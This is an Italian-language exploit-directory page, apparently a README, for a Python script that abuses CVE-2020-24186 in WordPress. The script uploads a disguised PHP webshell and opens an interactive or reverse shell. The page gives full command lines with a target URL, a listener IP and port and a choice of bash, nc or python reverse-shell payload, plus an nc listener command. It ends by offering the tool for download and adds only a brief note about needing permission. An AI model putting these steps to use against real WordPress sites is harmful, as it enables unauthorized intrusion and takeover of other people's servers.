Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-24186 | Kitploit
Strumenti/GitHubGitHub/gazettel/cve-2020-24186
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubgazettel/cve-2020-24186

CVE-2020-24186

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-24186

Questo script sfrutta la vulnerabilità CVE-2020-24186 in WordPress per caricare un payload PHP camuffato e ottenere una shell sul sistema target. Sono disponibili tre modalità di funzionamento:

  1. Shell interattiva:
    Carica la webshell di base e entra in modalità interattiva, permettendoti di inviare comandi tramite il parametro cmd.

  2. Reverse Shell manuale:
    Carica la webshell e invia il payload della reverse shell, ma non avvia automaticamente un listener. Devi avviare manualmente il tuo listener sull'IP e sulla porta specificati.

  3. Reverse Shell con pwntools:
    Carica la webshell, invia il payload della reverse shell e lo script avvia automaticamente un listener usando pwntools per catturare la connessione inversa.

Requisiti

  • Python 3.x
  • Librerie Python:
    • requests
    • pwn (pwntools)
  • (Opzionale) Configurazione del proxy se vuoi instradare il traffico (ad esempio, per test con Burp Suite).

Opzioni di utilizzo

  • --url: URL di base del sito target (es., http://10.10.110.119).
  • --blogpath: Percorso del post (predefinito: /?page=1).
  • --mode: Modalità di funzionamento, interactive o reverse.
  • --lhost: IP locale per la reverse shell (richiesto in modalità reverse).
  • --lport: Porta locale per la reverse shell (richiesta in modalità reverse).
  • --reverse_method: Metodo per la reverse shell: bash, nc o python (predefinito bash).
  • --manual: Se usato in modalità reverse, lo script non avvia il listener; devi avviare manualmente il tuo listener.
  • --use-proxy: Se impostato, le richieste verranno inviate tramite il proxy configurato.

Esempi

1. Shell interattiva

Carica una webshell e avvia una sessione interattiva per inviare comandi:

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy

2. Reverse Shell in modalità manuale

Carica la webshell, invia il payload della reverse shell, ma non avviare automaticamente un listener. Avvia manualmente il tuo listener (ad esempio, usando netcat):

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy

Quindi, in un altro terminale, avvia manualmente il tuo listener:

root@kitploit:~
nc -lvnp 9002

1. Reverse Shell con pwntools

Carica la webshell, invia il payload della reverse shell e fai in modo che lo script avvii automaticamente un listener con pwntools per catturare la connessione:

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy

Lo script attenderà una connessione su 10.10.1.1:9002 e, una volta connesso, fornirà una shell interattiva.

Note Assicurati che il sito target sia vulnerabile a CVE-2020-24186 e di avere i permessi necessari per i test di sicurezza. Puoi modificare il payload PHP usando l'opzione --php_payload se sono necessarie modifiche. Ricontrolla le impostazioni del proxy se usi il flag --use-proxy.

Scarica lo strumento